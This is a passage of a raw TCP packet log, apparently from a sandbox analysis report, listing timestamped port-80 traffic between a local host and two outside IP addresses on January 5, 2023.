                                                                                                                                                                                    Jan 5, 2023 08:58:29.960150957 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960172892 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960192919 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960207939 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960208893 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960208893 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960212946 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960237026 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960253954 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960269928 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968661070 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968697071 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968715906 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968733072 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968751907 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968770981 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968790054 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968836069 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968897104 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968894005 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968894005 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968894005 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968916893 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.968971014 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969027996 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969101906 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969135046 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969155073 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969186068 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969207048 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969207048 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969225883 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969238997 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969238997 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969247103 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969265938 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969274044 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969290972 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969302893 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969338894 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969355106 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969364882 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969377041 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969397068 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969409943 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969461918 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969481945 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969485998 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969501019 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969537973 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969540119 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969556093 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969574928 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969580889 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969594002 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969603062 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969614983 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969626904 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969634056 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969650984 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969655037 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969675064 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969680071 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969693899 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969698906 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969712973 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969715118 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969731092 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969758034 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969779968 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969780922 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969801903 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969821930 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969857931 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969863892 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969892025 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.969914913 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987319946 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987360954 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987390041 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987415075 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987442970 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987467051 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987493038 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987515926 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987540960 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987550020 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987550020 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987550020 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987565041 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987590075 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987616062 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987627029 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987627983 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987627983 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987641096 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987654924 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987667084 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987675905 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987694025 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987695932 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987719059 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987726927 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987744093 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987746000 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987767935 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987770081 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987793922 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987795115 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987816095 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987819910 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987867117 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.987867117 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015244007 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015312910 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015362978 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015408993 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015435934 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015455008 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015499115 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015500069 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015500069 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015525103 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015543938 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015558004 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015587091 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015604019 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015631914 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015646935 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015680075 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015692949 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015723944 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015741110 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015768051 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015782118 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015810966 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015826941 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015853882 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015870094 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015896082 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015914917 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015938997 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015958071 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.015983105 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016005039 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016060114 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016097069 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016104937 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016124010 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016149044 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016170025 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016191006 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016218901 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016232967 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016248941 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016277075 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016290903 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016335011 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016338110 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016382933 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016402960 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016432047 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016449928 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016479969 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016515017 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016526937 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016546965 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016573906 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016608000 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016619921 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016635895 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016668081 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016706944 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016715050 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016745090 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016761065 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016807079 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016832113 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016854048 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016870975 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016901016 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016927958 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016947031 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.016993999 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017007113 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017040014 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017061949 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017087936 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017098904 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.017151117 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029283047 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029354095 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029411077 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029459953 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029495001 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029495001 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029508114 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029556036 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029581070 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029602051 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029652119 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029673100 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029700041 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029714108 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029746056 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029793024 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029800892 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029838085 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029885054 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029901028 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029933929 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029944897 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.029978991 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030025005 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030047894 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030071020 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030117989 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030137062 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030164003 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030177116 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030209064 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030255079 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030273914 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030303001 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030328989 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030349016 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030358076 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030395031 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030425072 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030442953 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030461073 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030491114 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030502081 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030538082 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030544043 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030581951 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030597925 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030627966 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030673981 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030734062 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030761003 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030780077 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.030824900 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044379950 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044447899 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044493914 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044540882 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044588089 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044626951 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044636011 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044626951 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044626951 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044686079 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044704914 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044733047 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044744015 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044744015 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044780016 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044826984 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044853926 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044874907 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044922113 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044939995 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044969082 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.044982910 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045017004 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045063972 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045074940 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045074940 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045109034 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045150995 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045159101 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045178890 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045207024 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045222998 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045253992 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045269012 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045301914 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045309067 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045347929 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045356989 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045394897 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045422077 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045444012 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045454025 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045490980 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045536995 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045569897 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045603037 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045631886 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045650005 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045660973 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045697927 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:30.045712948 CET4974280192.168.2.445.66.230.123
